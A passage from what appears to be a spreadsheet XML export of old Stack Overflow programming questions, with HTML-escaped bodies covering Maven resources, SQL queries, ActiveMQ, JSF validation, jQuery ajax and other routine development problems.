        'hasChildren' =&gt; 0,
      ),
      57 =&gt; 
      array (
        'title' =&gt; 'About',
        'path' =&gt; 'about',
        'type' =&gt; '374',
        'pid' =&gt; 52,
        'hasChildren' =&gt; 1,
        'children' =&gt; 
        array (
          76 =&gt; 
          array (
            'title' =&gt; 'the author',
            'path' =&gt; 'about/the-author',
            'type' =&gt; '118',
            'pid' =&gt; 57,
            'hasChildren' =&gt; 0,
          ),
          77 =&gt; 
          array (
            'title' =&gt; 'the website',
            'path' =&gt; 'about/the-website',
            'type' =&gt; '118',
            'pid' =&gt; 57,
            'hasChildren' =&gt; 0,
          ),
        ),
      ),
    ),
  ),
);
print_r($example);
?&gt;
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Where should I put Velocity template files for a command line utility built with Maven?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a small command line utility project that I'm using Maven to manage. The utility is a very simple app to populate a Velocity template and dump the results to a new file. My problem is where to put my Velocity templates. When I put them in &lt;code&gt;src/test/resources/foo/bar/baz&lt;/code&gt;, &lt;code&gt;mvn test&lt;/code&gt; fails because it can't find the referenced template, even though it is clearly there in &lt;code&gt;target/classes/foo/bar/baz&lt;/code&gt;, which is where the &lt;code&gt;.class&lt;/code&gt; file for the test and the class under test are located. If I put the template in the top-level directory of the project, the test passes, but then I'm not following the Maven project structure, and I suspect that the actual packaged .jar file wouldn't function. What am I missing?&lt;/p&gt;
&lt;p&gt;UPDATE:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Method under test&lt;/strong&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public final void mergeTemplate(final String templateFileName, final Writer writer) throws ResourceNotFoundException, ParseErrorException, MethodInvocationException, IOException, Exception {
    Velocity.init();
    Velocity.mergeTemplate(templateFileName, Charset.defaultCharset().name(), context(), writer);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Test method&lt;/strong&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Test
public void testMergeTemplate() throws Exception {
    final FooGenerator generator = new FooGenerator();
    final StringWriter writer = new StringWriter();
    generator.mergeTemplate("foo.yaml", writer);
    Assert.assertEquals("Something went horribly, horribly wrong.", EXPECTED_RESULT, writer.toString().trim());
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The only place I can place &lt;code&gt;foo.yaml&lt;/code&gt; and have the tests pass is in the root directory of the project, i.e., as a peer of &lt;code&gt;src&lt;/code&gt; and &lt;code&gt;target&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Read Excel files from C# in 64 bit version server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;reading excel files from C# working well in 32 bit version server. It is &lt;strong&gt;not&lt;/strong&gt; working in &lt;strong&gt;64 bit version&lt;/strong&gt; (Windows 2003 server), because excel data connection dll not supported in &lt;strong&gt;64 bit version&lt;/strong&gt;.
Is any other option available ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to create a connection string outside web.config</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just thinking about this, is it possible to create a connection string outside the ASP.NET's web.config?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would you model a "default child" flag with an ORM?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;br /&gt;
I'm using an ORM (SQLAlchemy, but my question is quite implementation-agnostic) to model a many-to-many relationship between a parent class and its children.. I was wondering, what would be a simple way to express the concept "one of the children is the default/main one"?  &lt;/p&gt;
&lt;p&gt;For example, I'd need to persist the following:&lt;br /&gt;
This Person instance has Address X and Y, the main one is Y.&lt;/p&gt;
&lt;p&gt;I saw this implemented using a "middle" class like "PersonAddressRelation" that would contain "Person", "Address" and the "main" flag, but I think it looks a bit cumbersome.. Is there a better way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Sub-Query vs Join Confusion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a database which is in Access (you can get it &lt;a href="http://cid-84dd6ce2da273835.skydrive.live.com/self.aspx/.Public/Unisa.accdb" rel="nofollow"&gt;link text&lt;/a&gt;). If I run&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT DISTINCT Spl.Spl_No, Spl.Spl_Name
FROM Spl INNER JOIN Del 
   ON Spl.Spl_No = Del.Spl_No
WHERE Del.Item_Name &amp;lt;&amp;gt; 'Compass'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It provides the names of the suppliers that have never delivered a compass. However you can supposedly do this with a sub-query. So far myself and a few others have not been able to get it right.&lt;/p&gt;
&lt;p&gt;I did come close with the following, until we added more suppliers then it stopped working&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT SPL.SPL_Name
FROM SPL
LEFT JOIN DEL ON Del.SPL_No = SPL.SPL_No
WHERE (DEL.Item_Name&amp;lt;&amp;gt;"Compass") OR (DEL.Item_Name IS NULL)
GROUP BY SPL.SPL_Name
HAVING COUNT(DEL.SPL_No) = 0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So the question: Is this possible to do with a sub-query.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How are CSS frameworks used?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For some reason, it never dawned on me that there could be frameworks for CSS.  I have been working on my own personal site, and I just really hate 'designing' with CSS (I think more then a few programmers might agree with me).  Anyways, I understand the benefits of a framework for a language such as Java, PHP, [insert language].  I downloaded a couple different CSS frameworks and couldnt really figure out how to use them.  I guess I might be expecting an API or something (which obviously doesnt make sense given the lack of logic in CSS)... &lt;/p&gt;
&lt;p&gt;Has anyone here used (and would reccomend) a CSS framework?  Is it overkill for a relatively simple layout?&lt;/p&gt;
&lt;p&gt;Please do not post links to other sites, I know how to use Google.  I would rather hear the opinions and insights of the community.  Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ActiveMQ: Issue with queue lookup</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've set up a queue by configuring it in activemq.xml (ActiveMQ version 5.2.0) as described in the &lt;a href="http://activemq.apache.org/configure-startup-destinations.html"&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;destinations&amp;gt;
    &amp;lt;queue physicalName="FOO.BAR" /&amp;gt;
    &amp;lt;queue physicalName="DUMMY" /&amp;gt;
&amp;lt;/destinations&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm trying to access it from java (on the same host) with the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Hashtable properties = new Hashtable();
properties.put(Context.INITIAL_CONTEXT_FACTORY, 
    "org.apache.activemq.jndi.ActiveMQInitialContextFactory");
properties.put(Context.PROVIDER_URL, "tcp://localhost:61616");
context = new InitialContext(properties);
factory = (ConnectionFactory) context.lookup("ConnectionFactory");
connection = factory.createConnection();
session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);
queueName = "DUMMY"; // which can be either FOO.BAR or DUMMY
dest = (Destination) context.lookup(queueName);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm receveing the following error, although the queue is visible in jconsole (Tree / org.apache.activemq / Queue):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;javax.naming.NameNotFoundException: DUMMY
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Please tell me what I'm doing wrong. Many, many thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which event in the app's startup sequence is appropriate to trigger loading a config file in AIR/Flex?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a small AIR desktop application and I have some configuration infos that I want to store in a little file that's loaded at some point when the application starts and will be used to set public properties on the root application object. This should work just as if I had public variables declared in an &amp;lt;mx:Script&amp;gt; block at the beginning of my main MXML file.&lt;/p&gt;
&lt;p&gt;I seem to have the choice of three events that could be used to initiate loading the configuration file:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;invoke&lt;/li&gt;
&lt;li&gt;initialize&lt;/li&gt;
&lt;li&gt;creationComplete&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Did I overlook some more? Which one is appropriate and why? Does it matter at all?&lt;/p&gt;
&lt;p&gt;Example issues that come to my mind are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;are all components already accessible or will I get NULL references?&lt;/li&gt;
&lt;li&gt;will some of my settings be overwritten in a phase that's coming after the event?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There's probably more.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there good Java libraries that facilitate building command-line applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to write a simple command-line application in Java.  It would be nice to use a library that takes care of parsing commands and takes care of things like flags and optional/mandatory parameters...&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Something that has built-in TAB completion would be particularly great.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SSIS, dtsx and deployment packages</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm just trying to understand SSIS packages a bit better and how they are deployed. Correct me I'm wrong but for any deployment, I believe there needs to be at least two files a .SSISDeploymentManifest and a .dtsx. The .SSISDeploymentManifest  acts as the equivalent windows installer package which points to the .dtsx. The dtsx is the actual package of "stuff" that is referenced as an external file some how when you run the installer. When you install it, the package gets added to a list of ssis packages for that instance.&lt;/p&gt;
&lt;p&gt;My further questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If i wanted to keep previous version of the same package, can I just copy the bin directories with the two above files and keep separately should I need to roll back to a previous package?&lt;/li&gt;
&lt;li&gt;Where are these packages installed to? How does SSIS know where the packagess are?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Show joined value on bound field without custom type?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a GridView bound to an &lt;code&gt;ICollection&amp;lt;UserAnswer&amp;gt;&lt;/code&gt; that needs to show two columns:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:GridView ID="UserAnswersGridView" runat="server"&amp;gt;
    &amp;lt;Columns&amp;gt;
         &amp;lt;asp:BoundField DataField="Question.Name" HeaderText="Question Name" SortExpression="QuestionID" /&amp;gt;
         &amp;lt;asp:BoundField DataField="Score" HeaderText="Score" SortExpression="Score" /&amp;gt;
    &amp;lt;/Columns&amp;gt;
&amp;lt;/asp:GridView&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I get the error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;A field or property with the name 'Question.Name' was not found on the selected data source. &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Each &lt;code&gt;UserAnswer&lt;/code&gt; has a &lt;code&gt;QuestionId&lt;/code&gt; value which is what I would use to query the question name. In code, I would just call &lt;code&gt;userAssessment.Question.Name&lt;/code&gt;, but how would I do this with a bound column in a GridView without creating a new type?&lt;/p&gt;
&lt;p&gt;For reference this is the method that returns the data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static ICollection&amp;lt;UserAnswer&amp;gt; GetUserAnswers(Int32 userAssessmentId)
{
    DataContext database = new DataContext(GetConnectionString());
    return database.UserAnswers.Where(u =&amp;gt; u.UserAssessmentId == userAssessmentId).ToList();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Sorry if this explanation isn't very clear!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find Java classes implementing an interface</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Some time ago, I came across a piece of code, that used some piece of standard Java functionality to locate the classes that implemented a given interface. I know the functions were hidden in some non-logical place, but they could be used for other classes as the package name implied. Back then I did not need it, so I forgot about it, but now I do, and I can't seem to find the functions again. Where can these functions be found?&lt;/p&gt;
&lt;p&gt;Edit: I'm not looking for any IDE functions or anything, but rather something that can be executed within the Java application.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to find WITH RECOMPILE metadata in SQL Server (2005)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you find which SPs are declared WITH RECOMPILE, either in INFORMATION_SCHEMA, sys.objects or some other metadata?&lt;/p&gt;
&lt;p&gt;(I'm adding some code to my system health monitoring and want to warn on ones which are declared that way where it is not justifiable.)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note: I'm not looking for general text search for 'WITH RECOMPILE' - I can already do that, but it will give false positive for any commented or literal versions of the text.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can't add domain users to Reporting Services 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have &lt;code&gt;SSRS 2008&lt;/code&gt; setup on the database server.&lt;br&gt;
The server is part of the domain.&lt;br&gt;
Reporting Services is running under &lt;code&gt;NetworkService&lt;/code&gt;.&lt;br&gt;
When I try to add a domain user using the web interface (&lt;code&gt;Site Settings&lt;/code&gt; --&gt; &lt;code&gt;Security&lt;/code&gt; --&gt; &lt;code&gt;New Role Assignment&lt;/code&gt;), the page posts back but the user is not in the list.&lt;br&gt;
The server's log file contains the following Unhandled Exception:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;ui!ReportManager_0-1!954!01/12/2009-10:14:52:: Unhandled exception:
  System.Security.Principal.IdentityNotMappedException: Some or all
  identity references could not be translated.    at
  System.Security.Principal.SecurityIdentifier.Translate(IdentityReferenceCollection
  sourceSids, Type targetType, Boolean forceSuccess)    at
  System.Security.Principal.SecurityIdentifier.Translate(Type
  targetType)    at System.Security.Principal.WindowsIdentity.GetName() 
  at System.Security.Principal.WindowsIdentity.get_Name()    at
  ReportingServicesHttpRuntime.RsWorkerRequest.GetServerVariable(String
  name)    at
  System.Web.Security.WindowsAuthenticationModule.OnEnter(Object source,
  EventArgs eventArgs)    at
  System.Web.HttpApplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
  at System.Web.HttpApplication.ExecuteStep(IExecutionStep step,
  Boolean&amp;amp; completedSynchronously)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Any one have an idea on how to fix this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Java have native support for events, similar to that of C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a bit confused from what I've heard Java doesn't do events.&lt;/p&gt;
&lt;p&gt;But I know that it does GUI events.&lt;/p&gt;
&lt;p&gt;Am I missing something? Does java have an event handling mechanism?&lt;/p&gt;
&lt;p&gt;I'm aware that I can implement a publisher subscriber pattern, but I'm looking for native support within Java.&lt;/p&gt;
&lt;p&gt;I seem to remember something about Java Adding events in either Java 5 or 6 but I can't remember where I heard this and I may be making it up.&lt;/p&gt;
&lt;p&gt;Basically I'm wrapping a device in a java class the device throws events, and I'm looking for the most logical way of exposing this. I come mostly from a .Net Background and I'm looking for something like the events in .Net (C#)&lt;/p&gt;
&lt;p&gt;Any help would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>javascript - accessing private member variables from prototype-defined functions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any way to make "private" variables (those defined in the constructor), available to prototype-defined methods?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TestClass = function(){
    var privateField = "hello";
    this.nonProtoHello = function(){alert(privateField)};
};
TestClass.prototype.prototypeHello = function(){alert(privateField)};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;t.nonProtoHello()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but this doesn't:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;t.prototypeHello()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm used to defining my methods inside the constructor, but am moving away from that for a couple reasons.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Thanks sktrdie,&lt;/p&gt;
&lt;p&gt;That works, it would be nice not to have to create the &lt;code&gt;this.accessPrivateField&lt;/code&gt;. If my "hello" function is defined inside the constructor, &lt;code&gt;privateField&lt;/code&gt; is in the scope chain of the function, so I can treat &lt;code&gt;privateField&lt;/code&gt; as I would a private field in java. It's a little more cumbersome to set up accessors (&lt;code&gt;this.accessPrivateField&lt;/code&gt;), and then, &lt;code&gt;privateField&lt;/code&gt; isn't really private any more.&lt;/p&gt;
&lt;p&gt;I know javascript isn't java, but I like java!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python: Is there a way to determine the encoding of text file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know there is something buried in &lt;a href="http://stackoverflow.com/questions/90838/how-can-i-detect-the-encoding-codepage-of-a-text-file"&gt;here&lt;/a&gt;.  But I was just wondering if there is an actual way built into Python to determine text file encoding?&lt;/p&gt;
&lt;p&gt;Thanks for your help :)&lt;/p&gt;
&lt;p&gt;Edit:  As a side question, it can be ignored if you want but why is the type of encoding not put into the file so it could be detected easier?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Link to download Cassini source code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does any one know from where can I download source code for Cassini. I tried the link &lt;a href="http://www.asp.net/Projects/Cassini/Download" rel="nofollow"&gt;http://www.asp.net/Projects/Cassini/Download&lt;/a&gt; but this page does not exist now.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are constant C expressions evaluated at compile time or at runtime?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I write a &lt;em&gt;#define&lt;/em&gt; that performs an operation using other preprocessor constants, is the final value computed each time the macro appears at runtime? Does this depend on optimizations in the compiler, or is it covered under a standard?&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define EXTERNAL_CLOCK_FREQUENCY    32768
#define TIMER_1_S                   EXTERNAL_CLOCK_FREQUENCY
#define TIMER_100_MS                TIMERB_1_S / 10
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Will the operation &lt;em&gt;32768 / 10&lt;/em&gt; occur at runtime every time I use the TIMER_100_MS macro?&lt;/p&gt;
&lt;p&gt;I would like to avoid the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define EXTERNAL_CLOCK_FREQUENCY    32768
#define TIMER_1_S                   EXTERNAL_CLOCK_FREQUENCY
#define TIMER_100_MS                3276
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;h3&gt;Summary&lt;/h3&gt;
&lt;p&gt;A compiler is required to be able to evaluate constant integral expressions because they are necessary for calculating things like array sizes at compile time. However, the standard only says they "can" -- not "must" -- do so. Therefore, only a brain-dead compiler would not evaluate a constant integral expressions at compile time, but a simple check of the assembly output for an unconventional compiler would verify each case.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to add external data to an XML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got an XML Schema and an XML instance that is valid to that schema.&lt;/p&gt;
&lt;p&gt;This XML instance contains some data.&lt;/p&gt;
&lt;p&gt;I'd like to extend the XML instance with further data(my own meta-data per XML element in the XML instance) while keeping it valid to the provided schema.&lt;/p&gt;
&lt;p&gt;The real use-case is that I've my own control that gets its data via XML and I'd like to generate a new XML that somehow keeps additional meta-data that is related to the control's serialization.&lt;/p&gt;
&lt;p&gt;Couple of my solutions were to keep another document with a list of "XPath,Mode,Color"
that I load in the second pass after loading the XML.&lt;/p&gt;
&lt;p&gt;Another solution was to add id's to the XML nodes and this way referencing the nodes from another document (instead of using XPath).&lt;/p&gt;
&lt;p&gt;And another idea was to somehow add attributes (that are in my namespace per element) to the data XML instance but problem is that I'll probably have trouble validating the XML with the new attributes later when trying to load it back again.
(because the attributes I add to the XML are not defined in his schema)&lt;/p&gt;
&lt;p&gt;Do you have a better solution for this problem? Which of the solutions you would vote on? (Please explain.)&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linux C++ Debugger</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for the perfect Linux C++ debugger.  I don't expect success, but the search should be informative.&lt;/p&gt;
&lt;p&gt;I am a quite capable gdb user but STL and Boost easily crush my debugging skills.  It not that I can't get into the internals of a data structure, it's that it takes so long I usually find another way( "when in doubt, print it out" ).&lt;/p&gt;
&lt;p&gt;The macro language for gdb is weird and not very adaptive.  Just look at the code for the stanford gdb utils to print out stl structures. &lt;/p&gt;
&lt;p&gt;In short I'm unhappy with what I've got.&lt;/p&gt;
&lt;p&gt;I recently stumbled upon &lt;a href="http://zero-bugs.com"&gt;Zero Bugs&lt;/a&gt;.  It looks like a silver bullet.  What do the current Zero Bugs users think of it?&lt;/p&gt;
&lt;p&gt;Has anyone found other good solutions to the Linux C++ Debugger problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to SendKeys F12 from current .NET form/application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am pretty sure the following button-activated form code should raise a Control-F12 in my C# application:&lt;/p&gt;
&lt;p&gt;SendKeys("^{F12}");&lt;/p&gt;
&lt;p&gt;But it does not appear to go on up to the windows shell and activate another program that is listening for it.  My keyboard does work.  It seems like the sendkeys is getting intercepted somewhere and not sent on in a way that actually simulates the key stroke.  Any help?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Uri.AbsolutePath messes up path with spaces</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a WinApp I am simply trying to get the absolute path from a Uri object:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Uri myUri = new Uri(myPath); //myPath is a string
//somewhere else in the code
string path = myUri.AbsolutePath;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works fine if no spaces in my original path. If spaces are in there the string gets mangled; for example 'Documents and settings' becomes 'Documents%20and%20Setting' etc.&lt;/p&gt;
&lt;p&gt;Any help would be appreciated!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;
LocalPath instead of AbsolutePath did the trick!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to get the DropDown event of a ComboBox in a DataGridView</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have a DataGridView in which I dynamically build up a ComboBox column and add values to it. What's the best approach to trapping when the user clicks on the drop down button to show the drop down list. If I simply use CellClick on the DataGridView, I get that event even if the user doesn't actually click on the drop down button.&lt;/p&gt;
&lt;p&gt;So far what I've done is basically inherit from DataGridViewComboBoxCell and overrode the DropDownWidthProperty. In the getter I fire off a DropDown event. This works, but feels very "hacky". Any other suggestions?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; using System;
    using System.Windows.Forms;
public class DataGridViewEventComboBoxCell : DataGridViewComboBoxCell
{
    private bool dropDownShown = false;
    public event EventHandler BeforeDropDownShown;
    private void OnBeforeDropDownShown()
    {
        if (this.BeforeDropDownShown != null)
        {
            this.BeforeDropDownShown(this, new EventArgs());
        }
    }
    public override int DropDownWidth
    {
        get
        {
            if (!dropDownShown) //this boolean is here because I only need to trap it the very first time
            {
                this.OnBeforeDropDownShown();
                dropDownShown = true;
            }
            return base.DropDownWidth;
        }
        set
        {
            base.DropDownWidth = value;
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Request.Form sometimes returns the value of a checkbox, other times doesn't</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone know what's wrong with this?  I have some Classic ASP code that checks for the value of a checkbox, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!-- HTML page: page1.asp ---&amp;gt;
&amp;lt;input id="useBilling" name="useBilling" value="Y" type="checkbox" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And in my code page (let's call it page2.asp):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;' code
useBilling = Request.Form("useBilling")
' useBilling should be "Y" here
If useBilling = "Y" Then
    ' using billing info
Else
    ' not using billing info
End If
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that sometimes, even when I check the checkbox, it's passing an empty string to Request.Form and the wrong code is being executed.  I've placed a few Response.Write calls to trace it (this is VBScript, remember) and sometimes it says the value is "Y" but later when I check the value in the conditional, it's empty.&lt;/p&gt;
&lt;p&gt;Been wracking my brain trying to figure out why the hell this isn't working, because everything seems to be right, just Request.Form sometimes picks up the value and sometimes doesn't, even when it's checked.  Hell, sometimes I'll test it by commenting out the execution code and it will say the value is "Y" then when I uncomment the executing code, it's mysteriously empty again.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;  Weirdly enough, if I include a Response.End tag in the conditional, it will operate as I expect, but when I remove the Response.End it no longer finds the checkbox's value (returns empty) even though a minute ago (with Response.End uncommented) it output a test message that says "Okay, the checkbox was checked".  With Response.End commented out, it says "The checkbox wasn't checked".&lt;/p&gt;
&lt;p&gt;I even try outputting the value of the checkbox (which should be "Y" if it's checked, and nothing if it's not).  And, sure enough if the conditional includes Response.End it will output "Y" and if I remove Response.End, it's empty.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>JSF Multiple Partial Validations Scenario</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In JSF, is it possible to solve the following validation / updating scenario using the validation framework of JSF (aka validators, immediate, required, etc.)?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;+-- Form ----------------------------------------------------+
|                                                            |
| Field A: |____________|v|                                  |
| Field B: |____________|v|                                  |
| Field C: |____________|v| Button: [Update C using A and B] |
| Field D: |____________|v| Button: [Update D using B and C] |
|                                                            |
| More Fields: ...                                           |
|                                                            |
| Button : [Submit All]                                      |
+------------------------------------------------------------+
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where all fields are drop downs and where pressing the [Update C] button would only cause A, B and C to validate but not the rest, pressing the [Update D] button would only cause fields B, C and D to validate and pressing [Submit All] button would cause all fields to validate.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Local html file AJAX Call and jQuery Woes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a offline version of a website using jQuery and some xml files. I'm running in to a problem in jQuery when I do a $.ajax call on a xml file jQuery throws a error.&lt;/p&gt;
&lt;p&gt;When I look at the error I can tell its loading the XML file because its in the error's responceText property. It seams to work just fine in Firefox.&lt;/p&gt;
&lt;p&gt;This is how my call looks&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$.ajax({
    type: "GET",
    url: "Modules/" + ModuleID + "/ModuleContent.xml",
    dataType: "xml",
    success: function(x) { xml = x; ProcessXML(); },
    error: function(x) { alert(x.responceText); }
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I run this on a web server it works just fine. Its only when I run it from the file its self when I have this problem.&lt;/p&gt;
&lt;p&gt;Any ideas on how I can make this work in IE?&lt;/p&gt;
&lt;p&gt;Edit: I found the answer to my problem. &lt;a href="http://docs.jquery.com/Specifying_the_Data_Type_for_AJAX_Requests"&gt;Here&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is switching app.config at runtime possible?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way at runtime to switch out an applications app.config (current.config to new.config, file for file).  I have a backup/restore process which needs to replace its own application.exe.config file.  I have seen this &lt;a href="http://stackoverflow.com/questions/242568/is-it-possible-to-switch-application-configuration-file-at-runtime-for-net-appli"&gt;post&lt;/a&gt; but it does not answer how to do this at runtime.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Element.appendChild() chokes in IE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following javascript:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  css = document.createElement('style');
  css.setAttribute('type', 'text/css');
  css_data = document.createTextNode('');
  css.appendChild(css_data);
  document.getElementsByTagName("head")[0].appendChild(css);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;for some reason, in IE only, it chokes on "css.appendChild(css_data);"
Giving the error: "Unexpected call to method or property access"&lt;/p&gt;
&lt;p&gt;What's going on?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SMO scripting objects and security</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a customer that has a SQL database on a hosted server; call the db "myDatabase".&lt;br&gt;
&lt;br /&gt;The hosting co. has locked down object explorer - I can't see myDatabase in the database listed (I see tempdb and master).  However, if I "use myDatabase" and then "select * from myTable", all works fine.&lt;/p&gt;
&lt;p&gt;Since we have no access to object explorer, I can't right click and generate scripts. I thought that I might be able to use SMO to accomplish what I want, but when I attempt something similar to this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Server myServer = new Server(conn);
Database myDB = server.Databases["myDatabase"];
Table myTbl = myDB.Tables["myTable"];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It fails - myDB is null (when I iterate through the databases collection, as expected, I only see master and tempdb - the db's I can see in object explorer).  It obviously has to do with security - if I can't see the table in object explorer, it won't let me access it through SMO.  Anyone have any ideas of a workaround or alternate method to allow me to generate a script?&lt;/p&gt;
&lt;p&gt;Thx!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>matching a line that doesn't contain specific text with regular expressions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to do the following with regular expressions but not sure how to do it. I want it to match &lt;code&gt;one two&lt;/code&gt; when &lt;code&gt;one two&lt;/code&gt; is the beginning of the line unless the string contains &lt;code&gt;three&lt;/code&gt; anywhere after &lt;code&gt;one two&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
